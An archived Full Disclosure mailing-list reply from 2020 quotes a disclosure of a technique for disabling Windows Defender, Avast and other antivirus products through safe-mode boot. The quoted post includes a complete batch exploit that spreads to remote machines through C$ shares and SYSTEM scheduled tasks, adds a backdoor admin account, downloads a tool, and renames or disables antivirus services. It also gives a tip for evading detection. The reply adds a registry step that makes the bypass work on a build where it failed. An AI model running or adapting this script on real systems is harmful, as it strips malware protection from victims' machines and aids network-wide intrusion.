[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [FD] Disable Windows Defender and most other 3rd party antiviruses

To: fulldisclosure@xxxxxxxxxxxx
Subject: Re: [FD] Disable Windows Defender and most other 3rd party antiviruses
From: edwin@xxxxxxxxxxxxxxxxx
Date: Wed, 9 Dec 2020 06:35:49 -0500
I tested your POC on Windows 10 home, build 1904, and it failed to disable 
Windows Defender.  Windows Defender still loads in safe mode, so renaming the

"C:\Program Files (x86)\Windows Defender" folder fails because an executable in 
the folder is running.  To disable Windows Defender, you need to boot into safe 
mode, rename the 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend registry key 
so that Defender is not loaded at next safe boot, then reboot into safe mode 
again, where you can rename the folder.

I rather hope Microsoft doesn't change this because I have been seeking ways to 
disable Defender for a long time.  It is the worst antivirus tool, guzzles 
battery,
slows my rather fast system to a crawl. I actually agree with Microsoft that 
this isn't a real security risk, given that it needs administrative privileges 
to start, and
that it requires such an obvious reboot into safe mode.


On 12/6/2020 9:00 PM, Roberto Franceschetti wrote:
> Windows Defender and most other antivirus applications can be disabled by 
> booting into safe mode and renaming their application directories before 
> their AV services are started in Windows. The renaming of the directories can 
> be performed by creating a Windows NT Service that is allowed to start in 
> Safe Mode. While Windows stops most non-Windows, non-critical services from 
> starting when booting in Safe mode, I was able to make sure that my service 
> is started by adding it to:
> HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\[service name]
>
> I have successfully tested POCs on fully patched Windows 10 and Windows 
> Server 2016 machines. In all cases I was able to disable the following 
> antivirus products, even if they each had their flavor of password/tamper 
> protection enabled:
> Windows Defender
> Avast
> Kaspersky
> F-Secure
> Bitdefender
> [one more product goes here, but as that vendor recognized the issue and has 
> worked on a fix I will not mention it]
>
> The POC consists of a single .bat file that can be used to either disable the 
> antivirus on the local machine, or one running on a remote endpoint.
>
> Disclosure: Local admin rights are needed on the victim's PC (very common for 
> home users). For a remote exploit, this POC additionally requires the  
> attacker to have access to the remote C$ share and to be able to schedule 
> tasks remotely. Note that this however is a common scenario for IT tech 
> support staff - if just one of them is tricked into executing the exploit, 
> this could cause all AV protection on all Windows endpoints in the corporate 
> network to be disabled.
>
> A sample exploit to disable both Windows Defender and Avast can be found 
> below. The code is self-explanatory. On:
> https://logsat.com/WindowsAVBypass/
>
> you can find more details as to why I'm releasing this publicly, along with 
> an additional POC sample that is used to disable Bitdefender. Bitdefender 
> detects the original POC as malicious, but all that is needed to bypass that 
> AV is to split each command in a separate scheduled task. Please note that 
> some A/V might now detect this specific code as malicious, but what matters 
> is the methodology that allows to disable the AVs - the steps can be 
> performed in several different ways to go undetected.
>
> A screencast showing the POC remotely disabling Avast and Windows Defender is 
> at: https://youtu.be/VE3gwXt6uWg
>
> Roberto Franceschetti
> LogSat Software
>
>
> ============= Avast-DisableAV-Remote.bat ================================
>
> REM - Author: Roberto Franceschetti
> REM - Usage - to disable AV on local machine: C:\>Avast-DisableAV-Remote.bat
> REM - Usage - to disable AV on remote machine: C:\>Avast-DisableAV-Remote.bat 
> TargetComputerName (must be a hostname - IP won't work)
>
> IF NOT [%1] == [] (GOTO Remote) ELSE (GOTO Local)
>
> :Remote
> rem - we are exploiting a remote computer - copy script to victim and 
> schedule task to execute it
> COPY "%~dp0Avast-DisableAV-Remote.bat" 
> \\%1\C$\windows\temp\Avast-DisableAV-Remote.bat
> powershell -command "& {$time = 
> [DateTime]::Now.AddMinutes(1);$hourMinute=$time.ToString('HH:mm');SchTasks.exe
>  /Create /s %1 /SC ONCE /TN 'DisableAvast' /TR 
> 'C:\Windows\temp\Avast-DisableAV-Remote.bat' /ST $hourMinute /F /RU 'SYSTEM' 
> /RL HIGHEST }"
> GOTO :eof
>
> :Local
> rem - We are running .bat locally - run the exploit
> rem - create local admin account used to autologin on first safe boot
> net user AvastBounty "Avast123" /ADD
> net localgroup administrators AvastBounty /add
>
> rem - add autologin registry entries for next reboot
> powershell -command "& { iwr https://live.sysinternals.com/Autologon.exe 
> -OutFile c:\windows\temp\Autologon.exe }"
> c:\windows\temp\Autologon.exe -accepteula AvastBounty . Avast123
>
> rem - Now configure the next reboot in safe mode and autologin
> bcdedit /set {default} safeboot minimal
>
> rem - create the batch file executed by the DisableAvast service after the 
> safe reboot
> rem - will rename ProgramFiles\Avast folders/filesystem drivers, disable 
> WinDefender
> rem - will remove the safebot/autologon entries and reboot
>
> @echo off
> echo cd c:\windows\temp > c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Avast Software" "Avast Software Disabled" >> 
> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Windows Defender" "Windows Defender Disabled" >> 
> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Windows Defender Advanced Threat Protection" 
> "Windows Defender Advanced Threat Protection Disabled" >> 
> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files (x86)\Windows Defender" "Windows Defender 
> Disabled" >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\ProgramData\Avast Software" "Avast Software Disabled" >> 
> c:\windows\temp\DisableAvastAV.bat
>
> echo sc config "avast! Antivirus" start=disabled >> 
> c:\windows\temp\DisableAvastAV.bat
> echo sc config "avast! Tools" start=disabled >> 
> c:\windows\temp\DisableAvastAV.bat
> echo sc config "AvastWscReporter" start=disabled >> 
> c:\windows\temp\DisableAvastAV.bat
> echo sc config "aswbIDSAgent" start=disabled >> 
> c:\windows\temp\DisableAvastAV.bat
> echo sc config WinDefend start=disabled >> c:\windows\temp\DisableAvastAV.bat
>
> echo timeout /t 10 >> c:\windows\temp\DisableAvastAV.bat
> echo net stop SAVService >> c:\windows\temp\DisableAvastAV.bat
> echo net stop hmpalertsvc >> c:\windows\temp\DisableAvastAV.bat
> echo timeout /t 10 >> c:\windows\temp\DisableAvastAV.bat
> echo ren "C:\Program Files\Avast" Avast_Disabled >> 
> c:\windows\temp\DisableAvastAV.bat
>
> echo reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v 
> AutoAdminLogon /f /t REG_SZ /d "0" >> c:\windows\temp\DisableAvastAV.bat
> echo bcdedit /deletevalue {default} safeboot >> 
> c:\windows\temp\DisableAvastAV.bat
> echo sc delete DisableAvast >> c:\windows\temp\DisableAvastAV.bat
> rem - echo pause >> c:\windows\temp\DisableAvastAV.bat
> echo shutdown /r /f /t 0 >> c:\windows\temp\DisableAvastAV.bat
>
> rem - now create the Powershell script that will create a 
> "DisableAvastAV.exe" that will simply execute the DisableAvastAV.bat batch 
> file above:
> rem - this is done as Windows 10 won't allow a service to run a .bat file, 
> but a .exe will however run once just fine even if the service fails to start
>
> echo $source = @^" > c:\windows\temp\CreateService.ps1
> echo   using System; >> c:\windows\temp\CreateService.ps1
> echo   class Hello { >> c:\windows\temp\CreateService.ps1
> echo     static void Main() { >> c:\windows\temp\CreateService.ps1
> echo      
> System.Diagnostics.Process.Start(^"C:\\Windows\\Temp\\DisableAvastAV.bat^"); 
> >> c:\windows\temp\CreateService.ps1
> echo     } >> c:\windows\temp\CreateService.ps1
> echo   } >> c:\windows\temp\CreateService.ps1
> echo ^"@ >> c:\windows\temp\CreateService.ps1
> echo Add-Type -TypeDefinition $source -Language CSharp -OutputAssembly 
> ^"C:\Windows\Temp\DisableAvastAV.exe^" >> c:\windows\temp\CreateService.ps1
>
> @echo on
>
> rem - now execute the powershell script to create the DisableAvastAV.exe file 
> and install it as a service:
> powershell set-executionpolicy -executionpolicy bypass
> powershell c:\windows\temp\CreateService.ps1
> sc create DisableAvast binpath="c:\windows\temp\DisableAvastAV.exe" start=auto
>
> rem - this entry will allow the DisableAvast service to run in Safeboot as 
> well, otherwise it won't start:
> reg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DisableAvast 
> /f /t REG_SZ /d "service"
>
> rem - now reboot... Safe mode will be activated and the DisableAvastAV.exe 
> service will run, calling the DisableAvastAV.bat script, renaming the Avast 
> folders no longer protected by Tamper Protection
> rem - pause
> shutdown /r /f /t 0
>
> =============================================
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
References:
- [FD] Disable Windows Defender and most other 3rd party antiviruses
  - From: Roberto Franceschetti
Prev by Date: [FD] Cross-Site Scripting Vulnerabilities in BigtreeCMS 4.4.11
Next by Date: [FD] Vulnerability Path Traversal ACS
Previous by thread: Re: [FD] Disable Windows Defender and most other 3rd party antiviruses
Next by thread: [FD] VestaCP v0.9.8-26 - (period) Cross Site Scripting Web Vulnerability
Index(es):
- Date
- Thread